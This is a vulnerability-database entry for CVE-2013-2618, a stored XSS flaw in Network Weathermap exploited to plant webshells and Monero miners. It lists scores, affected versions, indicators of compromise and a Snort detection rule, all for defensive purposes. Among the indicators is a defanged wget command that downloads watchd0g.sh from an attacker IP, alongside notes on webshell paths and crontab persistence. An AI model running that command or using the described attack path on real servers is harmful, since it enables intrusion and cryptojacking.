cbcvebase.
CVE-2013-2618
published 2014-06-05

CVE-2013-2618: Cross-site scripting (XSS) vulnerability in editor.php in Network Weathermap before 0.97b allows remote attackers to inject arbitrary web script or HTML via…

PriorityP277medium4.3CVSS 2.0
AVNACMAuNCNIPAN
ITWEXPLOITVulnCheck KEVRansomware
Exploited in the wild
EPSS
4.68%
90.6th percentile
Cross-site scripting (XSS) vulnerability in editor.php in Network Weathermap before 0.97b allows remote attackers to inject arbitrary web script or HTML via the map_title parameter.

Affected

1 ranges
VendorProductVersion rangeFixed in
network-weathermapnetwork_weathermap<= 0.97

Detection & IOCsextracted from sources · hover to see the quote

path/plugins/weathermap/configs/conn.php
path/plugins/weathermap/editor.php
ip222.184.79.11
port5317
filenamewatchd0g.sh
filenamedada.x86_64
hash690aea53dae908c9afa933d60f467a17ec5f72463988eb5af5956c6cb301455b
hash48cf0f374bc3add6e3f73f6db466f9b62556b49a9f7abbcce068ea6fb79baa04
hash1155fae112da3072d116f39e90f6af5430f44f78638db3f43a62a9037baa8333
hash2c7b1707564fb4b228558526163249a059cf5e90a6e946be152089f0b69e4025
hashd814bf38f5cf7a58c3469d530d83106c4fc7653b6be079fc2a6f73a36b1b35c6
hash4a70da8ad6432d7aa639e6c5e0c03958eebb3728ef89e74c028807dd5d68e2b4
hash0adadc3799d06b35465107f98c07bd7eef5cb842b2cf09ebaeaa3773c1f02343
hash7f30ea52b09d6d9298f4f30b8045b77c2e422aeeb84541bb583118be2425d335
domainpool.minexmr.com
domainpool.supportxmr.com
domainxmr.krbpool.com
commandwget watchd0g.sh hxxp://222[.]184[.]]79[.]11:5317/watchd0g[.]sh
path/etc/rc.local
path/etc/crontab
snort
alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Possible CVE-2013-2618 Attempt (PHP Weathermap Persistent XSS)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/editor.php"; content:"&map_title="; nocase; content:"&map_legend="; nocase; content:"&editorsettings_showrelative="; fast_pattern; nocase; content:"="; pcre:"/.+?(?:on(?:(?:s(?:elec|ubmi)|rese)t|d(?:blclick|ragdrop)|(?:mouse|key)[a-z]|c(?:hange|lick)|(?:un)?load|focus|blur)|s(?:cript|tyle=))/R"; reference:url,blog.trendmicro.com/trendlabs-security-intelligence/cryptocurrency-miner-distributed-via-php-weathermap-vulnerability-targets-linux-servers/; reference:cve,2013-2618; classtype:attempted-admin; sid:2025459; rev:5;)
  • The persistent XSS results in a PHP webshell written to /plugins/weathermap/configs/conn.php (and cools.php); detect unexpected .php file creation under the weathermap configs directory.
  • Post-exploitation persistence: monitor for writes to /etc/rc.local and /etc/crontab by web server processes, and for the kernel parameter vm.nr_hugepages being modified (indicative of XMR mining preparation).
  • The vulnerability is also exploitable via the Cacti plugin management interface; monitor GET requests to weathermap-cacti-plugin-mgmt.php?action=viewconfig&file= for path traversal or injection payloads.
  • ·Exploitation requires Cacti's Plugin Architecture to be enabled with an outdated Network Weathermap version (0.97a or prior); patched versions (0.97b+) are not affected.
  • ·The campaign specifically targets publicly accessible Cacti instances with no authentication; instances behind authentication or not internet-facing are significantly harder to exploit.
  • ·The attacking IP addresses were not published as stable IOCs because the machines are assessed to be remotely controlled (likely compromised intermediaries), reducing their detection value.

CVSS provenance

nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:P/A:N
vulncheck4.3MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.